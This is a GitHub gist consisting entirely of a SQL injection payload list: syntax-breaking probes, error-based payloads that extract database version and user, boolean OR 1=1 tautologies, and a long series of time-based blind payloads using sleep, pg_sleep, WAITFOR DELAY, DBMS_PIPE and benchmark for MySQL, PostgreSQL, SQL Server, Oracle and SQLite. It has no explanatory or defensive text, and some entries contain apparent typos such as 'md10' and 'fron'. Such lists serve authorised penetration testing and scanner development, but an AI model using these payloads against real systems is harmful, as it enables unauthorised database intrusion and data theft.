-
-
Save ratnadip1998/fa4668b2a3109f7e4d68db5fec57192c to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' | |
| '' | |
| ` | |
| " | |
| "" | |
| % | |
| , | |
| \ | |
| ') | |
| ") | |
| ')) | |
| ")) | |
| '-- | |
| "-- | |
| '# | |
| "# | |
| '/* | |
| '-- | |
| '--+ | |
| '# | |
| /*+*/ | |
| ' " ; -- /* */ # ) ( + , | |
| '+AND+EXTRACTVALUE(1,+CONCAT(0x7e,+(SELECT+version()),+0x7e))-- | |
| '+AND+1=(SELECT+UTL_INADDR.get_host_address('0'))--' | |
| '+AND+1=(SELECT+UTL_INADDR.get_host_address(' | |
| '+OR+updatexml(1,concat(0x7e,user(),0x7e),1)-- | |
| '+OR+extractvalue(1,concat(0x7e,version(),0x7e))-- | |
| '+OR+1=CAST(version()+AS+INT)-- | |
| '+OR+1=CONVERT(int,@@version)-- | |
| '+OR+1=TO_NUMBER(DBMS_VERSION.VERSION)-- | |
| '+OR+sqlite_version()-- | |
| 'OR+''+=+' | |
| '+OR+1=1-- | |
| '+OR+1=2-- | |
| '+AND+1=1-- | |
| '+AND+1=2-- | |
| '+AND+1=1--' | |
| '+AND+1=2--' | |
| ')+OR+('1'='1 | |
| ')+OR+('1'='2 | |
| '+OR+1=1# | |
| '+OR+1=2# | |
| '+AND+1=1# | |
| '+AND+1=2# | |
| '+OR+1=1-- | |
| '+OR+1=2-- | |
| '+OR+1=1+FROM+dual-- | |
| '+OR+1=2+FROM+dual-- | |
| '+AND+1=CAST(1+AS+INT)=1 | |
| '+AND+1=CAST(1+AS+INT)=2 | |
| '+sleep(10) | |
| '+sleep(10)-- | |
| ')+or+sleep(10)=' | |
| +sleep(10) | |
| +sleep(10)# | |
| +sleep(10)-- | |
| +sleep(10)/*"+or+sleep(10)+or+'"+or+sleep(10)+or+'"/ | |
| +sleep(10)/*'+or+sleep(10)+or+'"+or+sleep(10)+or+"*/ | |
| +sleep(10)/*'or+sleep(10)or'"or+sleep(10)+or"*/ | |
| +sleep(10)=" | |
| +sleep(10)=' | |
| '=sleep(10)='1 | |
| 'and+sleep(10) | |
| 'and+sleep(10)-- | |
| '+and+sleep(10)+and+'1 | |
| 'and+sleep(10)--ratnadip | |
| 'and+sleep(10)and'1 | |
| &&sleep(10) | |
| &&sleep(10)# | |
| &&sleep(10)-- | |
| '&&sleep(10)&&'1 | |
| +or+sleep(10) | |
| +or+sleep(10)# | |
| +or+sleep(10)-- | |
| +or+sleep(10)=" | |
| 'or+sleep(10)' | |
| '))+or+sleep(10)=' | |
| +or+sleep(10)=' | |
| +(select+sleep(10)) | |
| ++sleep(10)+++' | |
| +and+sleep(10) | |
| +and+sleep(10)# | |
| +and+sleep(10)+and+('kleiton'='kleiton | |
| +and+sleep(10)-- | |
| +and+sleep(10)--ratnadip | |
| '+AND+IF(1=1,+SLEEP(5),+0)-- | |
| +order+by+sleep(10) | |
| +order+by+sleep(10)# | |
| +order+by+sleep(10)-- | |
| '+or+sleep(10) | |
| '+or+sleep(10)# | |
| '+or+sleep(10)-- | |
| '+or+sleep(10)=' | |
| ")+or+sleep(10)=" | |
| '+or+sleep(10)=0+# | |
| "+or+sleep(10)# | |
| "+or+sleep(10)=" | |
| '+or+sleep(10)=0%23 | |
| '))+or+pg_sleep(10)-- | |
| ')+or+pg_sleep(10)-- | |
| '+or+pg_sleep(10)-- | |
| '+or+sleep(10)=0%2f%2a | |
| '+or+sleep(10)=0/* | |
| +pg_sleep(10) | |
| +pg_sleep(10)# | |
| +pg_sleep(10)-- | |
| +or+pg_sleep(10) | |
| "+or+pg_sleep(10)-- | |
| +or+pg_sleep(10)# | |
| +or+pg_sleep(10)-- | |
| 1))+or+pg_sleep(10)-- | |
| 1))+or+sleep(10)# | |
| 1)+or+pg_sleep(10)-- | |
| 1)+or+sleep(10)# | |
| 1+or+pg_sleep(10)-- | |
| "))+or+pg_sleep(10)-- | |
| "))+or+sleep(10)=" | |
| +or+(sleep(10)+1)+limit+1+-- | |
| ")+or+pg_sleep(10)-- | |
| '+IF+1=1+WAITFOR+DELAY+'00:00:10'--' | |
| ;waitfor+delay+'0:0:10'-- | |
| +waitfor+delay+'00:00:10' | |
| +waitfor+delay+'00:00:10'# | |
| +waitfor+delay+'00:00:10'-- | |
| ';waitfor+delay+'0:0:10'-- | |
| ";waitfor+delay+'0:0:10'-- | |
| "));waitfor+delay+'0:0:10'-- | |
| ");waitfor+delay+'0:0:10'-- | |
| '));waitfor+delay+'0:0:10'-- | |
| ));waitfor+delay+'0:0:10'-- | |
| );waitfor+delay+'0:0:10'-- | |
| ');waitfor+delay+'0:0:10'-- | |
| '));waitfor+delay+'0:0:10'-- | |
| '+BEGIN+DBMS_LOCK.SLEEP(10);+END;--' | |
| +(select(0)from(select(sleep(10)))v) | |
| +(select(0)from(select(sleep(10)))v)%2f'+ | |
| +(select(0)from(select(sleep(10)))v)/*'+(select(3)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/ | |
| +(select(0)fron(select(sleep(10))v)+'"+ | |
| +(select*from(select(sleep(10)))a) | |
| +(select+*+from+(select(sleep(10)))ecmj) | |
| +(select+*+from+(select(sleep(10)))ecmj)# | |
| +(select+*+from+(select(sleep(10)))ecmj)-- | |
| +(select+*+from+(select(sleep(10)))yyyy) | |
| +(select+*+from+(select(sleep(10)))yyyy)# | |
| +(select+*+from+(select(sleep(10)))yyyy)-- | |
| +(select+1+from+(select+sleep(10))a) | |
| +and(select+6229+from(select(sleep(10)))hzqt)and'rljn'='rljn | |
| +and+(select+*+from+(select(sleep(10)))bakl)+and+'vrxe'='vrxe | |
| +and+(select+*+from+(select(sleep(10)))nqip) | |
| +and+(select+*+from+(select(sleep(10)))nqip)# | |
| +and+(select+*+from+(select(sleep(10)))nqip)-- | |
| +and+(select+*+from+(select(sleep(10)))yjoc)+and+'%'=' | |
| +and+(select+1033+from+(select(sleep(10)))xyjh)--+ | |
| +and+1091010=benchmark(10000000,md10(0x44444e4f)) | |
| +and+29410=like('abcdefg',upper(hex(randomblob(1000000000/2)))) | |
| +and+2947=like('abcdefg',upper(hex(randomblob(1000000000/2)))) | |
| +and+if(substring(user(),1,1)>=chr(910),sleep(10),1)-- | |
| ,(select*from(select(sleep(10)))a) | |
| ,(select+*+from+(select(sleep(10)))a) | |
| -1+or+1%3d((select+1+from+(select+sleep(10))a)) | |
| -1+or+1=((select+1+from+(select+sleep(10))a)) | |
| /*!133310'+and+(select+1033+from+(select(sleep(10)))xyjh)*/ | |
| %2b(select*from(select(sleep(10)))a)%2b' | |
| ';IF(1=1)WAITFORDELAY'00:00:10'-- | |
| %2c(select%20*%20from%20(select(sleep(10)))a) | |
| %2c(select%5*%5from%5(select(sleep(10)))a) | |
| '%2b(select*from(select(sleep(10)))a)%2b' | |
| '%2b(select*from(select(sleep(2)))a)%2b' | |
| ''||(select+1+from+(select+pg_sleep(10))x)||'' | |
| '+(select*from(select(if(1=1,sleep(10),false)))a)+' | |
| '+(select*from(select(sleep(10)))a)+' | |
| ;select+if((8303>8302),sleep(10),2356)#+ | |
| 'and(select+1033+from(select(sleep(10)))xyjh)--+- | |
| 'and(select+6229+from(select(sleep(10)))hzqt)and'rljn'='rljn | |
| 'and+1091010=benchmark(10000000,md10(0x44444e4f)) | |
| 'and+29410=like('abcdefg',upper(hex(randomblob(1000000000/2)))) | |
| 'or+29410=like('abcdefg',upper(hex(randomblob(1000000000/2)))) | |
| desc%2c(select*from(select(sleep(10)))a) | |
| ',''),/*test*/%26%26%09sleep(10)%09--+ | |
| /**/xor/**/sleep(10) | |
| 0'x0r(if(now()=sysdate(),sleep(10*1),0))xor'z | |
| 0'xor(if(now()=sysdate(),sleep(10),0))x0r'z | |
| 1'%2b(select*from(select(sleep(10)))a)%2b' | |
| 'xor(if(now()=sysdate(),sleep(10),0))or' | |
| 'xor(if(now()=sysdate(),sleep(10),0))x0r' | |
| 'xor(if(now()=sysdate(),sleep(10),0))x0r'z | |
| 0'xor(if(now()=sysdate(),sleep(10),0))xor'z | |
| 'xor(if(now()=sysdate(),sleep(5*5),0))or' | |
| 'xor(if(now()=sysdate(),sleep(6+1),0))0r' | |
| +'x0r(if(now()=sysdate(),sleep(10*1),0))xor'z | |
| "xor(if(now()=sysdate(),sleep(10),0))xor"z | |
| )if(1=1,sleep(10),0)(/*')xor(if(1=1,sleep(10),0))or('")xor(if(1=1,sleep(10),0))or("*/ | |
| +(if(now()=sysdate(),sleep(10),0)+and+10=10)"/ | |
| +if(1=1,sleep(10),0)/*'xor(if(1=1,sleep(10),0))or'"xor(if(1=1,sleep(10),0))or"*/ | |
| +if(4148=4148,exp(~(1)),0)/*'xor(if(4148=4148,exp(~(1)),0))or'"xor(if(4148=4148,sleep(10),0))or"*/ | |
| +if(now()=sysdate(),sleep(10),0) | |
| +if(now()=sysdate(),sleep(10),0)/"xor(if(now()=sysdate(),sleep(10),0))or"/ | |
| +if(now()=sysdate(),sleep(10),0)/'xor(1f(now()=sysdate(),sleep(10),0))0r'"xor | |
| +if(now()=sysdate(),sleep(10),0)/+xor(if(now()=sysdate(),sleep(10),0))or'"xor(if(now()=sysdate(),sleep(10),0))0r"*/ | |
| +or+29410=like('abcdefg',upper(hex(randomblob(1000000000/2)))) | |
| +or+2947=like('abcdefg',upper(hex(randomblob(1000000000/2)))) | |
| 1))+or+benchmark(10000000,md10(10))# | |
| 1)+or+benchmark(10000000,md10(10))# | |
| 1+or+benchmark(10000000,md10(10))# | |
| +benchmark(10000000,md10(10))# | |
| +benchmark(100000000,md10(10)) | |
| +benchmark(100000000,md10(10))# | |
| +benchmark(100000000,md10(10))-- | |
| +benchmark(3100,sha1(10))+' | |
| )+or+benchmark(10000000,md10(1))# | |
| '))+or+benchmark(10000000,md10(10))# | |
| "))+or+benchmark(10000000,md10(10))# | |
| ")+or+benchmark(10000000,md10(10))# | |
| "+or+benchmark(10000000,md10(10))# | |
| ')+or+benchmark(10000000,md10(10))# | |
| '+or+benchmark(10000000,md10(10))# | |
| +or+benchmark(100000000,md10(10)) | |
| +or+benchmark(100000000,md10(10))# | |
| +or+benchmark(100000000,md10(10))-- | |
| +randomblob(1000000000/2) | |
| +and+1337=dbms_pipe.receive_message(('a'),10) | |
| +and+1337=dbms_pipe.receive_message(('a'),10)+--+ | |
| +and+1337=dbms_pipe.receive_message((\'a\'),10) | |
| +and+1337=dbms_pipe.receive_message((\'a\'),10)+--+ | |
| +and+1337=dbms_pipe.receive_message((\\'a\\'),10) | |
| +and+1337=dbms_pipe.receive_message((\\'a\\'),10)+--+ | |
| +and+1337=dbms_pipe.receive_message(1,10) | |
| +and+1337=dbms_pipe.receive_message(1,10)+--+ | |
| +or+1337=dbms_pipe.receive_message(('a'),10) | |
| +or+1337=dbms_pipe.receive_message(('a'),10)+--+ | |
| +or+1337=dbms_pipe.receive_message((\'a\'),10) | |
| +or+1337=dbms_pipe.receive_message((\'a\'),10)+--+ | |
| +or+1337=dbms_pipe.receive_message((\\'a\\'),10) | |
| +or+1337=dbms_pipe.receive_message((\\'a\\'),10)+--+ | |
| +or+1337=dbms_pipe.receive_message(1,10) | |
| +or+1337=dbms_pipe.receive_message(1,10)+-- | |
| '||DBMS_PIPE.RECEIVE_MESSAGE('a',10)-- | |
| 1+AND+1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) | |
| 1+AND+1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)--+1337 | |
| '+AND+1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)+AND+'1337'='1337 | |
| ')+AND+1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)+AND+('1337'='1337)+ | |
| AND+1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)+AND+(1337=1337 | |
| 1+AND+(SELECT+1+FROM+(SELECT+COUNT(*),+CONCAT(FLOOR(RAND()*2),(SELECT+SLEEP(10)))+AS+x+FROM+information_schema.tables+GROUP+BY+x)+y); | |
| 'AND(CASEWHEN(SUBSTRING(version(),1,1)='P')THEN(SELECT4564FROMPG_SLEEP(10))ELSE4564END)=4564-- | |
| 'OR1=(SELECTCASEWHEN(1=1)THENPG_SLEEP(10)ELSENULLEND)-- | |
| '+OR+(CASE+WHEN+((CLOCK_TIMESTAMP()+-+NOW())+<+interval+'0:0:10')+THEN+(SELECT+'1'+||+pg_sleep(10))+ELSE+'0'+END)='1 | |
| '+OR+1=1;+SELECT+pg_sleep(10);-- | |
| '+OR+(SELECT+CASE+WHEN+(random()+<+0.10)+THEN+pg_sleep(10)+ELSE+pg_sleep(10)+END);-- | |
| IF+(1=1)+WAITFOR+DELAY+'0:0:10'; | |
| ';+IF+EXISTS+(SELECT+*+FROM+users)+WAITFOR+DELAY+'00:00:10';-- | |
| BEGIN+DBMS_PIPE.RECEIVE_MESSAGE('a',10);+END; | |
| '+OR+1=1;+BEGIN+DBMS_PIPE.RECEIVE_MESSAGE('a',10);+END;-- | |
| DECLARE+v+INTEGER;+BEGIN+IF+1=1+THEN+DBMS_PIPE.RECEIVE_MESSAGE('a',10);+END+IF;+END; | |
| '+OR+IF((NOW()=SYSDATE()),SLEEP(10),1)='0 | |
| '+OR+(CASE+WHEN+((CLOCK_TIMESTAMP()+-+NOW())+<+'0:0:10')+THEN+(SELECT+'1'||PG_SLEEP(10))+ELSE+'0'+END)='1 | |
| AND+1337=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10)+ELSE+1337+END) | |
| AND+1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) | |
| AND+(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF((1=1),0,10)))))+RANDSTR) | |
| AND+1337=(CASE+WHEN+(1=1)+THEN+(SELECT+1337+FROM+PG_SLEEP(10))+ELSE+1337+END) | |
| AND+1337=(CASE+WHEN+(1=1)+THEN+(SELECT+COUNT(*)+FROM+sysusers+AS+sys1,sysusers+AS+sys2,sysusers+AS+sys3,sysusers+AS+sys4,sysusers+AS+sys5,sysusers+AS+sys6,sysusers+AS+sys7)+ELSE+1337+END) | |
| AND+1337=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10)+ELSE+1337+END) | |
| AND+1337=(CASE+WHEN+(1=1)+THEN+(SELECT+1337+FROM+(SELECT+LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))))+ELSE+1337+END) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment